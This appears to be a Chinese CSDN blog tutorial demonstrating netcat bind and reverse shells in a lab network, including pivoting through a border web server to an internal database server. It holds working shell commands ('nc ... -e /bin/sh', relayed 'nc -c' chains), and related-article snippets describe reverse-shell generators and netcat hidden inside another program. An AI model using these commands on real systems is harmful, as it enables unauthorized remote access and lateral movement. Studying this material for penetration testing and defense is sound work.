内网中使用netcat进行正向和反向获取shell

最新推荐文章于 2024-03-11 21:43:05 发布
最新推荐文章于 2024-03-11 21:43:05 发布
阅读量2.6k 收藏 6
点赞数 4
分类专栏: 工具 内网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/110822147
版权

本次演示在linux环境下
一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell
正向shell
由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听):
内网机器上命令:nc -lvp 4444 -e /bin/sh
本地机器上命令:nc 10.0.78.41 4444
在这里插入图片描述

显示已经连接
进行验证:
在这里插入图片描述

说明正向连接成功
反向shell
反向shell是在本地vps上进行监听,目标机器进行连接
本地机器上命令:nc -lvp 9999
内网机器上命令:nc 10.0.78.29 9999 -e /bin/sh
在这里插入图片描述

显示已经连接
进行验证:
在这里插入图片描述

说明反向连接成功
接下来演练一个外网机器远程反向shell内网机器,以边界服务器为跳板
准备条件:
1.外网机器(vps)
2.边界服务器(web服务器)
3.内网服务器(数据库服务器)
Vps和web服务器,数据库服务器中间隔着一个防火墙lan IP:192.168.101.1
各ip分别如下:
1.外网机器(vps)
在这里插入图片描述

2.边界服务器(web服务器)

在这里插入图片描述

3.内网服务器(数据库服务器)

在这里插入图片描述

接下来
在vps输入命令:nc -lvp 1234
在数据库服务器输入命令:nc -lvp 1234 -e /bin/sh
在web服务器输入命令:nc -v 10.0.78.29 1234 -c “nc -v 192.168.101.103 1234”
在这里插入图片描述

显示已经连接
进行验证:
在这里插入图片描述

发现此时ip地址为数据库服务器的ip地址,成功

番茄酱料
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rsh:从CLI为Linux和Windows生成反向Shell
02-01
rsh ••• rsh是纯粹用Python 3编写的工具,可以轻松地为Linux和Windows生成反向外壳命令。 产品特点 使用此工具,您可以轻松地使用以下语言快速生成Linux和Windows支持的反向Shell命令: 重击 Bash反向壳 网猫 网猫OpenBSD 非传统 Python IPv4 IPv6 Ruby Perl PHP 电源外壳 节点JS TCSH Awk Java 用法 usage: rsh [-h] [-sh SH] [-listen] lhost lport positional arguments: lhost Specify local host ip lport Specify a local port optional arguments: -h, --help show this help message and exit -sh SH Specify the language to generate the reverse shell -listen Spawn a
netcat 实现shell反弹
u011975363的专栏
03-29 1386
反弹shell,效果类似于远程控制,当你连接上对方时,对方就控制了你的电脑,可执行你权限范围内的所有操作。 实现过程,受害者运行了攻击者给的相关代码后,主动与攻击者的服务器建立连接,使得攻击者成功控制受害者主机。 telnet,ssh为正向连接,由控制方去连接被控制方。 主机1 输入 主机2 输入 当输入ifconfig时可以查看到主机1的Ip信息说明反弹成功。...
内网正向连接与反向连接
最新发布
尘玥的故事
03-11 548
反向连接是控制主机监听一个端口,由受害主机反向去连接控制主机的过程,适用于受害主机出网(或出网且没有公网ip)的情况。例如,受害主机是一台位于内网,并且没有公网ip且能访问互联网的主机,控制主机无法直接通过ip地址访问到受害主机。例如下面,受害主机具有公网ip,被控主机kali可以通过ip地址访问到受害主机,所以能够使用正相连接来控制受害主机。正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有。由于正向连接是被攻击者主动连接攻击者,所以不受防火墙策略的限制。
shell正向反向
qq_46258964的博客
02-05 8242
正向shell反向shell 正向shell:控制端主动发起连接去连接被控制端 反向shell:被控制端主动连接控制端 在实战,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
Netcat 从监听开始简单易懂 ,正向反向shell 的学习过程
任雪飘的博客
03-01 571
大家好!我是任雪飘!一个web 菜鸡,讲一个nc 正向反向shell 的学习过程! 首先我们下载netcat 安装方式一 yum install -y netcat 或者 yum install -y nc 安装方式二 https://eternallybored.org/misc/netcat/ 把netcat 放入linux 系统里面 进入netcat-0.7.1.tar.gz所在目录,并执行下面的命令: tar -zxvf netcat-0.7.1.tar.gz -C /u
Netcat反向连接与反弹 Shell
Kali与编程
02-17 988
反向连接,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。在反向连接,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。假设我们要在目标主机上执行一个连接程序,连接到攻击者主机的IP地址为192.168.1.100,端口号为1234的监听程序,并执行一个shell。在目标主机上执行连接程序,并连接到攻击者主机的监听程序。
netcat瑞士军刀(正向shell反向shell
逍遥小哥的博客
12-04 231
不管是正向shell还是反向shell 它们都是由被控制端将命令行输入和输入通过tcp/udp端口,发送到控制端,只是正向shell是由控制端主动发起连接的,而反弹shell是被控制端主动发起连接的。原理:被控端将cmd.exe重定向到控制端的6666端口,控制端只需要监听本地的6666端口,被控端主动连接控制端,即可获得shell。原理:被控端将cmd重定向到本地1111端口,控制端主动连接到被控制端的1111端口,即获得shell反向shell(有安全设备防护,控制端无法主动连接被控制端。
netcat使用及反弹shell
Bu2n的博客
02-20 5008
netcat反弹shell
qq_56414082的博客
08-11 254
在执行命令漏洞,一般的利用漏洞是执行反弹shell进行其他操作。执行反弹shell的命令有许多。反弹shell因为是受害者,反向连接远程服务器,请求是内部到外部,所以防火墙是不会进行拦截的。
使用netcat正向 / 反向shell
软件测试技术的博客
01-08 365
reverse shell bind shell reverse shell描述图: 在此示例,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动...
linux正向连接shell_使用netcat正向 / 反向shell
weixin_39947306的博客
12-24 1006
reverse shellbind shellreverse shell描述图:在此示例,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。先启动...
Reverse-Shell-Client:反向外壳客户端是netcat反向外壳侦听器的基于Python的替代方案
05-08
反向外壳客户端 ... 您还可以下载独立版本( rsh-client-standalone.py ),这是一个较小的版本,没有自定义命令,当希望将shell作为另一个进程(如果netcat不可用)获取本地shell权限时,该版本最有用系统。
使用netcat(瑞士军刀)进行文件传输
09-15
netcat是开源世界的经典应用之一,被称为网络瑞士军刀。几乎所有的发行版都会带这个小程序,用它可以在任意两台有网络链接的机器上传输文件, 下面我们就来简单看下他的使用方法吧。
Netcat源码分析和ppt
01-04
Netcat源码分析带文注释以及Netcat详细分析的ppt ppt内容包含nc的使用方式,nc原理,nc代码结构的拆解以及明文传输的应对方法等
EmbeddedNetcatReverseShell:将 netcat 嵌入到程序并让它在运行时发送反向 shell 请求
06-14
EmbeddedNetcatReverseShell 尝试将 netcat 嵌入到程序并让它在运行时发送反向 shell 请求。 将 netcat.exe 嵌入到我制作的掷骰子的 C# 程序的一个非常简单的概念证明。 在运行掷骰子时,程序会创建一个 ...
netcat nc端口监听 反向连接断问题
whatday的专栏
12-09 2694
当系统关闭ipv6时,进行 nc -lvp 5555 的监听时,一连上瞬间会断开,如图: 解决方案:开启nc ipv4 命令如下 nc -4 -lvp 5555 效果如图: 此时就不会断开了 ...
科普:Windows下Netcat使用手册
热门推荐
sdujava2011
07-20 4万+
本文转自https://www.91ri.org/7761.html,稍作修改,所有权力归原作者所有。 简介: 在网络工具有“瑞士军刀”美誉的NetCat(以下简称nc),在我们用了N年了至今仍是爱不释手。因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约10K左右,而且功能不减少)。 参数格式 连接到某处: nc [-options] hostnam
nc
diexian5592的博客
09-09 262
nc 用于设置路由器。执行本指令可设置路由器的相关参数。 nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...] -g<网关> 设置路由...
正向shell和反弹shell
weixin_45936149的博客
03-26 9025
正向shell反弹shell的利用场景以及使用技巧
如何使用netcat进行Windows socket测试
06-01
要在 Windows 上使用 Netcat 进行套接字测试,可以使用 nc.exe 工具,它是 Netcat 的 Windows 版本。以下是一个示例命令: ``` nc.exe -v example.com 80 < request.txt > response.txt ``` 这个命令将连接到 example.com 的 80 端口,并从 request.txt 文件读取请求消息。然后,它将发送请求消息并等待响应。最后,它将响应消息保存到 response.txt 文件。 可以根据需要使用不同的参数和测试场景来调整这个命令。例如,可以使用循环来重复运行测试,或者使用不同的请求消息和响应消息来测试不同的情况。 需要注意的是,nc.exe 工具可能会被一些防火墙和安全软件视为恶意软件,因此在使用之前需要进行适当的安全性评估和授权。同时,需要确保在测试期间不会对目标系统造成任何损害或影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值